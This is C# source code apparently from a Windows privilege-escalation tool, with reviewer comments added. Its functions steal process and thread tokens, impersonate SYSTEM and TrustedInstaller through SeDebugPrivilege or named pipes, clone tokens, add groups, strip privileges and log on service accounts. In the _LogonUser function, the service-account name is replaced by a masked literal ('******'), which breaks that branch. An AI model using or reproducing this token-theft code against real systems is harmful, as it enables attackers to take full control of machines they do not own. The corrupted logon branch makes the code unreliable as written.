 ////////////////////////////////////////////////////////////////////////////////
 // Enables, Disables, or Removes a privilege from a Token
 ////////////////////////////////////////////////////////////////////////////////
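 /// <summary>
 /// Enables, disables or removes the privilege named by cLP.Privilege on the token the
 /// command-line flags select: a remote process token (Remote), thread tokens
 /// (Impersonation) or the caller's own token.
 /// </summary>
 /// <param name="cLP">Parsed command line; Remote, Impersonation, ProcessID and Privilege are read.</param>
 /// <param name="hToken">Token handle handed to <see cref="TokenManipulation"/>.</param>
 /// <param name="attribute">Attribute to apply (enable / disable / remove).</param>
 private static void _AlterPrivilege(CommandLineParsing cLP, IntPtr hToken, Winnt.TokenPrivileges attribute)
 {
     using (TokenManipulation t = new TokenManipulation(hToken))
     {
         if (cLP.Remote && !cLP.Impersonation)
         {
             // A remote token was asked for: fail instead of silently falling back to the
             // caller's own token when the target process cannot be opened.
             if (!t.OpenProcessToken(cLP.ProcessID))
             {
                 Console.WriteLine("[-] Unable to open token for process {0}", cLP.ProcessID);
                 return;
             }
             t.SetWorkingTokenToRemote();
         }
         else if (cLP.Impersonation)
         {
             // Thread-token path: list the threads of the target (or current) process, then
             // apply the attribute through SetThreadTokenPrivilege.
             if (cLP.Remote)
             {
                 t.ListThreads(cLP.ProcessID);
             }
             else
             {
                 t.ListThreads(Process.GetCurrentProcess().Id);
             }
             t.SetThreadTokenPrivilege(cLP.Privilege, attribute);
         }
         else
         {
             t.SetWorkingTokenToSelf();
         }

         // NOTE(review): the original also ran this after the thread-token branches without
         // selecting a working token first; kept as-is — confirm which token
         // TokenManipulation targets in that case.
         t.SetTokenPrivilege(cLP.Privilege, attribute);
     }
 }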
        ////////////////////////////////////////////////////////////////////////////////
        // Starts Windows Module Installer and impersonates or starts a process with
        // the cloned token. There are better ways of doing this net .O
        ////////////////////////////////////////////////////////////////////////////////
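        /// <summary>
        /// Runs the TrustedInstaller path of <see cref="TokenManipulation"/>: impersonation when
        /// no command was given, otherwise a process started with the cloned token. Requires
        /// SeDebugPrivilege on <paramref name="hToken"/>; it is enabled first if held but disabled.
        /// </summary>
        /// <param name="cLP">Parsed command line; Command and CommandAndArgs are read.</param>
        /// <param name="hToken">Token handle whose privileges are checked and used.</param>
        private static void _GetTrustedInstaller(CommandLineParsing cLP, IntPtr hToken)
        {
            bool exists, enabled;

            // Same constant as the enable call below, so the check and the SetTokenPrivilege
            // call cannot drift apart (the original used a string literal here).
            TokenInformation.CheckTokenPrivilege(hToken, Winnt.SE_DEBUG_NAME, out exists, out enabled);

            if (!exists)
            {
                Console.WriteLine("[-] SeDebugPrivilege Is Not Assigned to Token");
                return;
            }

            using (TokenManipulation t = new TokenManipulation(hToken))
            {
                t.SetWorkingTokenToSelf();

                if (!enabled)
                {
                    t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
                }

                // IsNullOrEmpty (not IsNullOrWhiteSpace) is what the original tested; preserved.
                if (string.IsNullOrEmpty(cLP.Command))
                {
                    t.GetTrustedInstaller();
                }
                else
                {
                    t.GetTrustedInstaller(cLP.CommandAndArgs);
                }
            }
        }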
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
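        /// <summary>
        /// Uses the token of the process or thread identified on the command line. Without a
        /// command the calling thread impersonates that token; with a command a new process
        /// is started under it.
        /// </summary>
        /// <param name="cLP">Parsed command line; ProcessID, ThreadID and Command are read.</param>
        /// <param name="hToken">Token handle handed to <see cref="TokenManipulation"/>.</param>
        /// <returns><c>true</c> when impersonation or process creation reported success.</returns>
        private static bool _StealToken(CommandLineParsing cLP, IntPtr hToken)
        {
            // The two original branches acquired the working token identically and differed
            // only in the process case (token duplication) and in the final action.
            bool launchProcess = !string.IsNullOrWhiteSpace(cLP.Command);

            using (TokenManipulation t = new TokenManipulation(hToken))
            {
                if (0 != cLP.ProcessID && t.OpenProcessToken(cLP.ProcessID))
                {
                    t.SetWorkingTokenToRemote();

                    if (launchProcess)
                    {
                        // Process creation runs on a duplicated impersonation-level token,
                        // not on the opened handle itself.
                        if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
                        {
                            return false;
                        }
                        t.SetWorkingTokenToNewToken();
                    }
                }
                else if (0 != cLP.ThreadID && t.OpenThreadToken((uint)cLP.ThreadID, Winnt.TOKEN_ALL_ACCESS))
                {
                    t.SetWorkingTokenToThreadToken();
                }
                else
                {
                    // Also reached when an ID was given but the open call failed; the
                    // original message is kept.
                    Console.WriteLine("[-] Process or Thread ID not Specified");
                    return false;
                }

                return launchProcess ? t.StartProcessAsUser(cLP.Command) : t.ImpersonateUser();
            }
        }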
        ////////////////////////////////////////////////////////////////////////////////
        // Disable and remove all the privileges on a given token
        ////////////////////////////////////////////////////////////////////////////////
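        /// <summary>
        /// Disables and then removes every privilege on the selected token: the token of
        /// cLP.ProcessID when Remote is set, otherwise the caller's own token.
        /// </summary>
        /// <param name="cLP">Parsed command line; Remote and ProcessID are read.</param>
        /// <param name="hToken">Token handle handed to <see cref="TokenManipulation"/>.</param>
        private static void _NukePrivileges(CommandLineParsing cLP, IntPtr hToken)
        {
            using (TokenManipulation t = new TokenManipulation(hToken))
            {
                if (cLP.Remote)
                {
                    // Open the remote token before selecting it as the working token — the
                    // order every other helper in this file uses; the original selected first.
                    if (!t.OpenProcessToken(cLP.ProcessID))
                    {
                        return;
                    }
                    t.SetWorkingTokenToRemote();
                }
                else
                {
                    t.SetWorkingTokenToSelf();
                }

                t.DisableAndRemoveAllTokenPrivileges();
            }
        }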
        ////////////////////////////////////////////////////////////////////////////////
        // Impersonates a SYSTEM token or creates a new process with the cloned token
        ////////////////////////////////////////////////////////////////////////////////
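        /// <summary>
        /// Impersonates a SYSTEM token or starts a process with the cloned token. With
        /// SeDebugPrivilege on <paramref name="hToken"/> the <see cref="TokenManipulation"/>
        /// path is used (enabling the privilege first if needed); otherwise the NamedPipes path.
        /// </summary>
        /// <param name="cLP">Parsed command line; Command, CommandAndArgs and Arguments are read.</param>
        /// <param name="hToken">Token handle whose privileges are checked and used.</param>
        private static void _GetSystem(CommandLineParsing cLP, IntPtr hToken)
        {
            bool exists, enabled;

            // Same constant as the enable call below (the original used a string literal).
            TokenInformation.CheckTokenPrivilege(hToken, Winnt.SE_DEBUG_NAME, out exists, out enabled);

            if (!exists)
            {
                // No debug privilege: the named-pipe route takes Command and Arguments
                // separately, unlike the TokenManipulation overload.
                if (string.IsNullOrEmpty(cLP.Command))
                {
                    NamedPipes.GetSystem();
                }
                else
                {
                    NamedPipes.GetSystem(cLP.Command, cLP.Arguments);
                }
                return;
            }

            using (TokenManipulation t = new TokenManipulation(hToken))
            {
                t.SetWorkingTokenToSelf();

                if (!enabled)
                {
                    t.SetTokenPrivilege(Winnt.SE_DEBUG_NAME, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
                }

                if (string.IsNullOrEmpty(cLP.Command))
                {
                    t.GetSystem();
                }
                else
                {
                    t.GetSystem(cLP.CommandAndArgs);
                }
            }
        }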
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
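        /// <summary>
        /// Opens the token of <paramref name="processID"/>, duplicates it at delegation level
        /// (falling back to impersonation level) and hands the copy to AssignPrimaryToken.
        /// </summary>
        /// <param name="remote">Must be <c>true</c>; without a process ID nothing is done.</param>
        /// <param name="processID">Process whose token is duplicated.</param>
        /// <param name="command">Not used. NOTE(review): the original referenced it only inside
        /// an unreachable branch — confirm whether callers expect it to be honoured.</param>
        /// <param name="hToken">Token handle handed to <see cref="TokenManipulation"/>.</param>
        private static void _CloneToken(bool remote, int processID, string command, IntPtr hToken)
        {
            if (!remote)
            {
                Console.WriteLine("[-] Unable to identify Process ID");
                return;
            }

            // The original's "Unable to parse {command}" message sat behind a second !remote
            // test after this guard and could never execute; it has been dropped.

            using (TokenManipulation t = new TokenManipulation(hToken))
            {
                if (!t.OpenProcessToken(processID))
                {
                    return;
                }
                t.SetWorkingTokenToRemote();

                if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityDelegation))
                {
                    Console.WriteLine("[-] Unable to Duplicate with Delegation, attempting Impersonation");
                    if (!t.DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
                    {
                        return;
                    }
                }

                // Final step: nothing follows, so the result needs no check here.
                t.AssignPrimaryToken();
            }
        }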
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
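        /// <summary>
        /// Adds the group(s) given by the "groups" command-line value to the selected token:
        /// the token of cLP.ProcessID when Remote is set, otherwise the caller's own token.
        /// </summary>
        /// <param name="cLP">Parsed command line; "groups", Remote and ProcessID are read.</param>
        /// <param name="hToken">Token handle handed to <see cref="TokenManipulation"/>.</param>
        private static void _AddGroup(CommandLineParsing cLP, IntPtr hToken)
        {
            string groups;

            if (!cLP.GetData("groups", out groups))
            {
                return;
            }

            using (TokenManipulation t = new TokenManipulation(hToken))
            {
                if (cLP.Remote)
                {
                    // A failed open used to fall through to the caller's own token; fail the
                    // request instead of modifying a token the user did not name.
                    if (!t.OpenProcessToken(cLP.ProcessID))
                    {
                        Console.WriteLine("[-] Unable to open token for process {0}", cLP.ProcessID);
                        return;
                    }
                    t.SetWorkingTokenToRemote();
                }
                else
                {
                    t.SetWorkingTokenToSelf();
                }

                // Second argument is the original's literal false; its meaning is defined by
                // TokenManipulation.SetTokenGroup.
                t.SetTokenGroup(groups, false);
            }
        }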
        ////////////////////////////////////////////////////////////////////////////////
        //
        ////////////////////////////////////////////////////////////////////////////////
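        /// <summary>
        /// Logs a user on via <see cref="TokenManipulation"/>.LogonUser and runs the configured
        /// command under the result. The "username" value picks the flavour: "DOMAIN\user" is
        /// an interactive logon with a password, "NT SERVICE\name" a service logon, and the
        /// well-known local account names a service logon under NT AUTHORITY.
        /// </summary>
        /// <param name="cLP">Parsed command line; "username", "password", "groups", Command and Arguments are read.</param>
        /// <param name="hToken">Token handle handed to <see cref="TokenManipulation"/>.</param>
        private static void _LogonUser(CommandLineParsing cLP, IntPtr hToken)
        {
            string username;

            if (!cLP.GetData("username", out username))
            {
                return;
            }

            string domain   = ".";
            string password = string.Empty;

            Winbase.LOGON_TYPE logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_INTERACTIVE;

            if (username.Contains('\\'))
            {
                // Ordinal, case-insensitive prefix test replaces ToLower()+StartsWith, which
                // were culture-sensitive.
                bool serviceAccount = username.StartsWith("nt service", StringComparison.OrdinalIgnoreCase);
                string[] split = username.Split('\\');
                username = split.LastOrDefault();

                if (serviceAccount)
                {
                    logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
                    domain    = "NT SERVICE";
                    Console.WriteLine("Service Logon");
                }
                else
                {
                    domain = split.FirstOrDefault();
                    if (!cLP.GetData("password", out password))
                    {
                        return;
                    }
                    Console.WriteLine("User Logon");
                }
            }
            else
            {
                // Invariant lower-casing: ToLower() is culture-dependent and can miss these
                // ASCII literals under some locales.
                switch (username.Trim().ToLowerInvariant())
                {
                case "localservice":
                case "localsystem":
                case "networkservice":
                    // The three well-known accounts had identical handling; merged.
                    username  = "******";
                    logonType = Winbase.LOGON_TYPE.LOGON32_LOGON_SERVICE;
                    domain    = "NT AUTHORITY";
                    break;

                default:
                    // Result not checked, as in the original — presumably a missing password
                    // is allowed for plain local accounts; confirm against GetData's contract.
                    cLP.GetData("password", out password);
                    break;
                }
            }

            using (TokenManipulation t = new TokenManipulation(hToken))
            {
                string groups;
                if (cLP.GetData("groups", out groups))
                {
                    t.LogonUser(domain, username, password, groups, logonType, cLP.Command, cLP.Arguments);
                }
                else
                {
                    t.LogonUser(domain, username, password, logonType, cLP.Command, cLP.Arguments);
                }
            }
        }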